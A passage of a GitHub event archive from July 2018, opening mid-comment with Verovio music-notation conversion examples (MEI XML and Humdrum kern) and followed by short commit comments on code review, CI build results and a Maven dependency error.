endid=\"#note-L5F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L6\">\r\n                            <staff xml:id=\"staff-L6F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L6F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L7F1\" dur=\"2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L8F1\" dur=\"2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    <beam xml:id=\"beam-L9F1-L10F1\">\r\n                                        <note xml:id=\"note-L9F1\" dur=\"16\" oct=\"4\" pname=\"f\" grace=\"unacc\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L10F1\" dur=\"16\" oct=\"4\" pname=\"g\" grace=\"unacc\" accid.ges=\"n\" />\r\n                                    </beam>\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L7F1\" staff=\"1\" startid=\"#note-L7F1\" endid=\"#note-L9F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L11\">\r\n                            <staff xml:id=\"staff-L11F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L11F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L12F1\" dur=\"1\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L12F1\" staff=\"1\" startid=\"#note-L12F1\" endid=\"#note-L15F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L13\">\r\n                            <staff xml:id=\"staff-L13F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L13F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L14F1\" dur=\"1\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    <beam xml:id=\"beam-L15F1-L16F1\">\r\n                                        <note xml:id=\"note-L15F1\" dur=\"16\" oct=\"4\" pname=\"f\" grace=\"unacc\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L16F1\" dur=\"16\" oct=\"4\" pname=\"g\" grace=\"unacc\" accid.ges=\"n\" />\r\n                                    </beam>\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L17\" right=\"end\">\r\n                            <staff xml:id=\"staff-L17F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L17F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L18F1\" dur=\"1\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n\r\nThe two examples from commit https://github.com/rism-ch/verovio/commit/39ad887904eb2fc71bc6351560c735a772b4fc3d are now converted and rendered correctly:\r\n\r\n<img width=\"876\" alt=\"screen shot 2018-07-07 at 12 14 25 pm\" src=\"https://user-images.githubusercontent.com/3487289/42409748-45f3d802-81df-11e8-9f91-a320432eed96.png\">\r\n\r\n```\r\n**kern\r\n*clefG2\r\n*M8/8\r\n=\r\n1eett\r\n16ddqLL\r\n=\r\n1cc\r\n=\r\n[1ffTT\r\n=\r\n1ff]TTT\r\n=\r\n*-\r\n```\r\n\r\nMEI conversion:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-07T12:15:09\" version=\"2.0.0-dev-e22c4bd\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000000928966225\">\r\n                <score xml:id=\"score-0000000929229885\">\r\n                    <scoreDef xml:id=\"scoredef-0000000262373588\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000000164214768\">\r\n                            <staffDef xml:id=\"staffdef-0000001609385944\" clef.shape=\"G\" clef.line=\"2\" meter.count=\"8\" meter.unit=\"8\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000000676148279\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L4\">\r\n                            <staff xml:id=\"staff-L4F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L4F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L5F1\" dur=\"1\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L6F1\" dur=\"16\" oct=\"5\" pname=\"d\" grace=\"unacc\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L5F1\" staff=\"1\" startid=\"#note-L5F1\" endid=\"#note-L6F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L7\">\r\n                            <staff xml:id=\"staff-L7F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L7F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L8F1\" dur=\"1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L9\">\r\n                            <staff xml:id=\"staff-L9F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L9F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L10F1\" dur=\"1\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L10F1\" staff=\"1\" startid=\"#note-L10F1\" tstamp2=\"1m+9.0\" />\r\n                            <tie xml:id=\"tie-L10F1-L12F1\" startid=\"#note-L10F1\" endid=\"#note-L12F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L11\">\r\n                            <staff xml:id=\"staff-L11F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L11F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L12F1\" dur=\"1\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n\r\nAnd the second example:\r\n\r\n<img width=\"889\" alt=\"screen shot 2018-07-07 at 12 15 32 pm\" src=\"https://user-images.githubusercontent.com/3487289/42409758-700adb72-81df-11e8-8831-5b37bb79c0ca.png\">\r\n\r\n```\r\n**kern\r\n*clefG2\r\n*M2/2\r\n=\r\n1eett\r\n16ddqLL\r\n=\r\n1cc\r\n=\r\n[1ffTT\r\n=\r\n1ff]TTT\r\n*-\r\n```\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-07T12:16:06\" version=\"2.0.0-dev-e22c4bd\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001718665825\">\r\n                <score xml:id=\"score-0000001961468625\">\r\n                    <scoreDef xml:id=\"scoredef-0000000569587272\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000000265819086\">\r\n                            <staffDef xml:id=\"staffdef-0000000955023757\" clef.shape=\"G\" clef.line=\"2\" meter.count=\"2\" meter.unit=\"2\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000001460032914\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L4\">\r\n                            <staff xml:id=\"staff-L4F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L4F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L5F1\" dur=\"1\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L6F1\" dur=\"16\" oct=\"5\" pname=\"d\" grace=\"unacc\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L5F1\" staff=\"1\" startid=\"#note-L5F1\" endid=\"#note-L6F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L7\">\r\n                            <staff xml:id=\"staff-L7F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L7F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L8F1\" dur=\"1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L9\">\r\n                            <staff xml:id=\"staff-L9F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L9F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L10F1\" dur=\"1\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L10F1\" staff=\"1\" startid=\"#note-L10F1\" tstamp2=\"1m+3.0\" />\r\n                            <tie xml:id=\"tie-L10F1-L12F1\" startid=\"#note-L10F1\" endid=\"#note-L12F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L11\" right=\"invis\">\r\n                            <staff xml:id=\"staff-L11F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L11F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L12F1\" dur=\"1\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n"}},"created_at":"2018-07-07T10:17:58Z"}
{"id":"7932127975","type":"CommitCommentEvent","actor":{"login":"DyWN"},"repo":{"name":"DyWN/android_kernel_xiaomi_msm8937-1"},"payload":{"comment":{"id":29629201,"position":null,"line":null,"path":null,"commit_id":"87262a16d91811a2a9eee17c88c77a9982dd041a","created_at":"2018-07-07T10:20:36Z","updated_at":"2018-07-07T10:20:36Z","author_association":"OWNER","body":"this is incorrect, don't cherry-pick"}},"created_at":"2018-07-07T10:20:36Z"}
{"id":"7932128954","type":"CommitCommentEvent","actor":{"login":"lawiet7"},"repo":{"name":"lawiet7/helloworld"},"payload":{"comment":{"id":29629202,"position":null,"line":null,"path":null,"commit_id":"76d7c8dec5bcbef9a40de1999f2fab959cdec7db","created_at":"2018-07-07T10:21:29Z","updated_at":"2018-07-07T10:21:29Z","author_association":"OWNER","body":"First Branch"}},"created_at":"2018-07-07T10:21:29Z"}
{"id":"7932129270","type":"CommitCommentEvent","actor":{"login":"juliangieseke"},"repo":{"name":"dcos/dcos-ui"},"payload":{"comment":{"id":29629206,"position":272,"line":272,"path":"plugins/nodes/src/js/components/NodesTable-new.tsx","commit_id":"8ce8ba36ff33280151b09326cfe38451e2094166","created_at":"2018-07-07T10:21:48Z","updated_at":"2018-07-07T10:21:48Z","author_association":"CONTRIBUTOR","body":"This needs to happen before sorting .."}},"created_at":"2018-07-07T10:21:48Z"}
{"id":"7932137263","type":"CommitCommentEvent","actor":{"login":"TheQwertiest"},"repo":{"name":"TheQwertiest/foo-jscript-panel"},"payload":{"comment":{"id":29629217,"position":null,"line":null,"path":null,"commit_id":"57393822ae42e1ebd77911c0f934471903975b4e","created_at":"2018-07-07T10:29:07Z","updated_at":"2018-07-07T10:29:07Z","author_association":"OWNER","body":">> I already expect you're getting Scintilla errors on startup if you have JScript Panel installed at the same time. \r\n\r\nSo that what was causing! Thanks a lot, you saved me a lot of time here!\r\n\r\n>> Also, the current scintilla is currently customised with support for all other lexers removed\r\n\r\nI was hoping it could be done by configuring scintilla (https://github.com/mirror/scintilla/blob/master/scripts/LexGen.py) before building it. I've yet to confirm though that Scintilla submodule integration is possible at all, since it might require a lot of non-trivial patching (e.g. we want it as a static library rather than dll), but we'll see how it goes =)"}},"created_at":"2018-07-07T10:29:07Z"}
{"id":"7932139126","type":"CommitCommentEvent","actor":{"login":"imperdin"},"repo":{"name":"imperdin/xmr-stak"},"payload":{"comment":{"id":29629222,"position":null,"line":null,"path":null,"commit_id":"56e56e9fd63e672db16c38eacdd30adee5086107","created_at":"2018-07-07T10:30:41Z","updated_at":"2018-07-07T10:30:41Z","author_association":"OWNER","body":"While this operation mutilate the high bits, the processing `& MASK` will prevent the high bits from having any affect on the calculation so they can be ignored and only process the NOT bits on the 32 bit uint"}},"created_at":"2018-07-07T10:30:41Z"}
{"id":"7932140244","type":"CommitCommentEvent","actor":{"login":"Edisonsix"},"repo":{"name":"IPSFoundation/IPS_Whitepaper"},"payload":{"comment":{"id":29629224,"position":null,"line":null,"path":null,"commit_id":"b78ad8b48bb24af9c4e7487c69b29f55d65e23ee","created_at":"2018-07-07T10:31:38Z","updated_at":"2018-07-07T10:31:38Z","author_association":"CONTRIBUTOR","body":"IPS Currency Whitepaper."}},"created_at":"2018-07-07T10:31:38Z"}
{"id":"7932141395","type":"CommitCommentEvent","actor":{"login":"Edisonsix"},"repo":{"name":"IPSFoundation/IPS_Whitepaper"},"payload":{"comment":{"id":29629226,"position":null,"line":null,"path":null,"commit_id":"8c98b7f9d283cf9dae4b19ee4ff5fd7cd67ca35e","created_at":"2018-07-07T10:32:39Z","updated_at":"2018-07-07T10:32:39Z","author_association":"CONTRIBUTOR","body":"The first version."}},"created_at":"2018-07-07T10:32:39Z"}
{"id":"7932141399","type":"CommitCommentEvent","actor":{"login":"noahp"},"repo":{"name":"noahp/piesvg"},"payload":{"comment":{"id":29629227,"position":null,"line":null,"path":null,"commit_id":"f1a745b9bd669f6cc1f176360206b20f8b579a74","created_at":"2018-07-07T10:32:40Z","updated_at":"2018-07-07T10:32:40Z","author_association":"OWNER","body":"Heh yeah... I totally ripped off that crate when I started this 😬"}},"created_at":"2018-07-07T10:32:40Z"}
{"id":"7932141922","type":"CommitCommentEvent","actor":{"login":"Josephat-n"},"repo":{"name":"Josephat-n/Implementation-of-decoder-2-by-4."},"payload":{"comment":{"id":29629228,"position":null,"line":null,"path":null,"commit_id":"9e6d93ef2106f5d9bd60f545beadfa70a7859e3a","created_at":"2018-07-07T10:33:08Z","updated_at":"2018-07-07T10:33:08Z","author_association":"OWNER","body":"A decoder is a device that input codes and changes it into a set of signals. A 2 by 4 decoder is 4 output logic circuit that takes 2 inputs. At any instance of time, according to the combination of the input signals, there can only be 1 output signal that is high (boolean value 1) and all the rest are low."}},"created_at":"2018-07-07T10:33:08Z"}
{"id":"7932142223","type":"CommitCommentEvent","actor":{"login":"juliangieseke"},"repo":{"name":"dcos/dcos-ui"},"payload":{"comment":{"id":29629229,"position":8,"line":8,"path":"plugins/nodes/src/js/components/NodesTable-new.tsx","commit_id":"8ce8ba36ff33280151b09326cfe38451e2094166","created_at":"2018-07-07T10:33:25Z","updated_at":"2018-07-07T10:33:25Z","author_association":"CONTRIBUTOR","body":"TODO: …"}},"created_at":"2018-07-07T10:33:25Z"}
{"id":"7932142989","type":"CommitCommentEvent","actor":{"login":"sberyozkin"},"repo":{"name":"thorntail/thorntail"},"payload":{"comment":{"id":29629231,"position":null,"line":null,"path":null,"commit_id":"65c625935d80e7e9657195cff7dacf450ec738e6","created_at":"2018-07-07T10:34:11Z","updated_at":"2018-07-07T10:34:11Z","author_association":"CONTRIBUTOR","body":"Hi Scott, np at all, Ken has already reverted. "}},"created_at":"2018-07-07T10:34:11Z"}
{"id":"7932143895","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629232,"position":null,"line":null,"path":null,"commit_id":"ece1724d71ce1f8ebc476d2005fb7e172e7136f9","created_at":"2018-07-07T10:34:58Z","updated_at":"2018-07-07T10:34:58Z","author_association":"NONE","body":"Allow-Multiple-AirLoops-in-Airflow-Netwrok-Model (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2975 of 2975 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: BND diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ece1724d71ce1f8ebc476d2005fb7e172e7136f9-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ece1724d71ce1f8ebc476d2005fb7e172e7136f9-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-07T10:34:58Z"}
{"id":"7932145377","type":"CommitCommentEvent","actor":{"login":"juliangieseke"},"repo":{"name":"dcos/dcos-ui"},"payload":{"comment":{"id":29629234,"position":182,"line":182,"path":"plugins/nodes/src/js/components/NodesTable-new.tsx","commit_id":"8ce8ba36ff33280151b09326cfe38451e2094166","created_at":"2018-07-07T10:36:15Z","updated_at":"2018-07-07T10:36:15Z","author_association":"CONTRIBUTOR","body":"… should go into a more general Util "}},"created_at":"2018-07-07T10:36:15Z"}
{"id":"7932148695","type":"CommitCommentEvent","actor":{"login":"Boostkos"},"repo":{"name":"GGkas/30-Days-Project"},"payload":{"comment":{"id":29629235,"position":null,"line":null,"path":null,"commit_id":"ad4ae47df24e8bcd8aef06c398cca12092a509b3","created_at":"2018-07-07T10:39:19Z","updated_at":"2018-07-07T10:39:19Z","author_association":"NONE","body":"AAAAAAA veRy NIce"}},"created_at":"2018-07-07T10:39:19Z"}
{"id":"7932149042","type":"CommitCommentEvent","actor":{"login":"juliangieseke"},"repo":{"name":"dcos/dcos-ui"},"payload":{"comment":{"id":29629236,"position":299,"line":299,"path":"plugins/nodes/src/js/components/NodesTable-new.tsx","commit_id":"8ce8ba36ff33280151b09326cfe38451e2094166","created_at":"2018-07-07T10:39:36Z","updated_at":"2018-07-07T10:39:36Z","author_association":"CONTRIBUTOR","body":"I think this and the icon can be decoupled a bit better 🤔"}},"created_at":"2018-07-07T10:39:36Z"}
{"id":"7932149078","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629237,"position":null,"line":null,"path":null,"commit_id":"ece1724d71ce1f8ebc476d2005fb7e172e7136f9","created_at":"2018-07-07T10:39:38Z","updated_at":"2018-07-07T10:39:38Z","author_association":"NONE","body":"Allow-Multiple-AirLoops-in-Airflow-Netwrok-Model (lgu1234) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ece1724d71ce1f8ebc476d2005fb7e172e7136f9-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T10:39:38Z"}
{"id":"7932150314","type":"CommitCommentEvent","actor":{"login":"juliangieseke"},"repo":{"name":"dcos/dcos-ui"},"payload":{"comment":{"id":29629238,"position":36,"line":36,"path":"plugins/ui-kit-candidates/SortableColumnHeaderCell.tsx","commit_id":"8ce8ba36ff33280151b09326cfe38451e2094166","created_at":"2018-07-07T10:40:28Z","updated_at":"2018-07-07T10:40:28Z","author_association":"CONTRIBUTOR","body":"This whole logic can go into sortHandler"}},"created_at":"2018-07-07T10:40:28Z"}
{"id":"7932150666","type":"CommitCommentEvent","actor":{"login":"juliangieseke"},"repo":{"name":"dcos/dcos-ui"},"payload":{"comment":{"id":29629239,"position":44,"line":44,"path":"plugins/ui-kit-candidates/SortableColumnHeaderCell.tsx","commit_id":"8ce8ba36ff33280151b09326cfe38451e2094166","created_at":"2018-07-07T10:40:46Z","updated_at":"2018-07-07T10:40:46Z","author_association":"CONTRIBUTOR","body":"And this can go into children "}},"created_at":"2018-07-07T10:40:46Z"}
{"id":"7932152119","type":"CommitCommentEvent","actor":{"login":"marcphilipp"},"repo":{"name":"junit-team/junit5"},"payload":{"comment":{"id":29629241,"position":null,"line":null,"path":null,"commit_id":"5d4a5d3eb7c259e141619d8fa20fde028cf359a1","created_at":"2018-07-07T10:42:03Z","updated_at":"2018-07-07T10:42:03Z","author_association":"MEMBER","body":"LGTM! 👍 "}},"created_at":"2018-07-07T10:42:03Z"}
{"id":"7932153907","type":"CommitCommentEvent","actor":{"login":"meriadec"},"repo":{"name":"LedgerHQ/ledger-live-desktop"},"payload":{"comment":{"id":29629242,"position":null,"line":null,"path":null,"commit_id":"fbefd8f844320ff21f470035a8915257cd674208","created_at":"2018-07-07T10:43:34Z","updated_at":"2018-07-07T10:43:34Z","author_association":"MEMBER","body":"Dyou want my personal opinion, or what has been decided?"}},"created_at":"2018-07-07T10:43:34Z"}
{"id":"7932156253","type":"CommitCommentEvent","actor":{"login":"yoshidx12"},"repo":{"name":"yoshidx12/caravan"},"payload":{"comment":{"id":29629246,"position":null,"line":null,"path":null,"commit_id":"5ec9edf583ffce5d7ed7651dd7ae8f528ed8c35e","created_at":"2018-07-07T10:45:46Z","updated_at":"2018-07-07T10:45:46Z","author_association":"OWNER","body":"コメント誤り\r\n2018-07-07　です"}},"created_at":"2018-07-07T10:45:46Z"}
{"id":"7932159652","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29629252,"position":null,"line":null,"path":null,"commit_id":"40abc9f048998ad8f7904ffb40e3b88bf921fa11","created_at":"2018-07-07T10:49:00Z","updated_at":"2018-07-07T10:49:00Z","author_association":"NONE","body":"I had to stop at this was killing the framework. 2M games should be enough..."}},"created_at":"2018-07-07T10:49:00Z"}
{"id":"7932165990","type":"CommitCommentEvent","actor":{"login":"isnullxbh"},"repo":{"name":"isnullxbh/signals"},"payload":{"comment":{"id":29629257,"position":null,"line":null,"path":null,"commit_id":"e91af05a4c7bf24e1fa28b63bbbc47b10a28d6ae","created_at":"2018-07-07T10:54:42Z","updated_at":"2018-07-07T10:54:42Z","author_association":"OWNER","body":"@travis, thank you!!!"}},"created_at":"2018-07-07T10:54:42Z"}
{"id":"7932167346","type":"CommitCommentEvent","actor":{"login":"jwendell"},"repo":{"name":"openshift-istio/istio-images-centos"},"payload":{"comment":{"id":29629261,"position":3,"line":3,"path":"Dockerfile.galley","commit_id":"7c33c881333457713e6aa1fca7770048de45c644","created_at":"2018-07-07T10:55:52Z","updated_at":"2018-07-07T10:55:52Z","author_association":"MEMBER","body":"This should be -daily, no?"}},"created_at":"2018-07-07T10:55:52Z"}
{"id":"7932170042","type":"CommitCommentEvent","actor":{"login":"marc2k3"},"repo":{"name":"TheQwertiest/foo-jscript-panel"},"payload":{"comment":{"id":29629263,"position":null,"line":null,"path":null,"commit_id":"57393822ae42e1ebd77911c0f934471903975b4e","created_at":"2018-07-07T10:57:51Z","updated_at":"2018-07-07T10:57:51Z","author_association":"NONE","body":"You'll also need to rename the fields used by the internal stats DB...\r\n\r\nhttps://github.com/TheQwertiest/foo-jscript-panel/blob/foo_spider_monkey_panel/foo_spider_monkey_panel/stats.h#L121L141\r\n\r\nI prefixed mine with `jsp` - you should use something else.\r\n\r\nYou may want to grab this page from my wiki for the docs (obviously making the appropriate changes to it)..\r\n\r\nhttps://github.com/marc2k3/foo_jscript_panel/wiki/Playback-Stats"}},"created_at":"2018-07-07T10:57:51Z"}
{"id":"7932170298","type":"CommitCommentEvent","actor":{"login":"p4perf4ce"},"repo":{"name":"p4perf4ce/FreindQuizRequest"},"payload":{"comment":{"id":29629264,"position":null,"line":null,"path":null,"commit_id":"c30b0691b607e472288c4aebdb6919dcb932d43c","created_at":"2018-07-07T10:58:06Z","updated_at":"2018-07-07T10:58:06Z","author_association":"OWNER","body":"![vendingmachine](https://user-images.githubusercontent.com/39671216/42410150-4907f584-820f-11e8-9619-4d145fed05dc.png)\r\n"}},"created_at":"2018-07-07T10:58:06Z"}
{"id":"7932170481","type":"CommitCommentEvent","actor":{"login":"apjanke"},"repo":{"name":"googlemaps/google-maps-services-java"},"payload":{"comment":{"id":29629265,"position":null,"line":null,"path":null,"commit_id":"5d5d17ed52b21bf9504cecc32498fb6fbdef59be","created_at":"2018-07-07T10:58:15Z","updated_at":"2018-07-07T10:58:15Z","author_association":"CONTRIBUTOR","body":"Do you know how long it will be until 0.2.9 is available in Maven Central? I'm still getting an error when trying to build against it.\r\n\r\n```\r\n[~/local/repos/gmsj-cli]\r\n$ mvn clean package\r\n[INFO] Scanning for projects...\r\n[INFO]\r\n[INFO] -------------------< net.apjanke.gmsj-cli:gmsj-cli >--------------------\r\n[INFO] Building gmsj-cli 0.2.9\r\n[INFO] --------------------------------[ jar ]---------------------------------\r\nDownloading from central: https://repo.maven.apache.org/maven2/com/google/maps/google-maps-services-java/0.2.9/google-maps-services-java-0.2.9.pom\r\n[WARNING] The POM for com.google.maps:google-maps-services-java:jar:0.2.9 is missing, no dependency information available\r\nDownloading from central: https://repo.maven.apache.org/maven2/com/google/maps/google-maps-services-java/0.2.9/google-maps-services-java-0.2.9.jar\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] BUILD FAILURE\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] Total time: 1.829 s\r\n[INFO] Finished at: 2018-07-07T06:56:51-04:00\r\n[INFO] ------------------------------------------------------------------------\r\n[ERROR] Failed to execute goal on project gmsj-cli: Could not resolve dependencies for project net.apjanke.gmsj-cli:gmsj-cli:jar:0.2.9: Could not find artifact com.google.maps:google-maps-services-java:jar:0.2.9 in central (https://repo.maven.apache.org/maven2) -> [Help 1]\r\n```"}},"created_at":"2018-07-07T10:58:15Z"}
{"id":"7932173459","type":"CommitCommentEvent","actor":{"login":"Mr-kissen"},"repo":{"name":"well-kao/hushubao"},"payload":{"comment":{"id":29629275,"position":null,"line":null,"path":null,"commit_id":"8bc86312a2386146e1cc3f166787ebe15c23539a","created_at":"2018-07-07T11:00:38Z","updated_at":"2018-07-07T11:00:38Z","author_association":"COLLABORATOR","body":"666"}},"created_at":"2018-07-07T11:00:38Z"}
{"id":"7932176234","type":"CommitCommentEvent","actor":{"login":"serjeason"},"repo":{"name":"jsrn/cove.sugeworld.com"},"payload":{"comment":{"id":29629276,"position":null,"line":null,"path":null,"commit_id":"83a1eeaed8b8eb3fcba6b74b59b64b39befd2189","created_at":"2018-07-07T11:03:04Z","updated_at":"2018-07-07T11:03:04Z","author_association":"COLLABORATOR","body":"Yeah, I agree. We should keep this separate."}},"created_at":"2018-07-07T11:03:04Z"}
{"id":"7932176799","type":"CommitCommentEvent","actor":{"login":"ravernkoh"},"repo":{"name":"ravernkoh/kfreestyle2d"},"payload":{"comment":{"id":29629277,"position":null,"line":null,"path":null,"commit_id":"af52f86ed064432ce78c9844efb79af8e9683c71","created_at":"2018-07-07T11:03:32Z","updated_at":"2018-07-07T11:03:32Z","author_association":"OWNER","body":"Okay! If I find the time, I will submit a PR."}},"created_at":"2018-07-07T11:03:32Z"}
{"id":"7932177172","type":"CommitCommentEvent","actor":{"login":"torfsen"},"repo":{"name":"ckan/ckan"},"payload":{"comment":{"id":29629278,"position":9,"line":15,"path":"CHANGELOG.rst","commit_id":"3f335705243bedf19e7b87bf9e2fe9a8f2abace6","created_at":"2018-07-07T11:03:52Z","updated_at":"2018-07-07T11:03:52Z","author_association":"CONTRIBUTOR","body":"Should this be `request.endpoint`?"}},"created_at":"2018-07-07T11:03:52Z"}
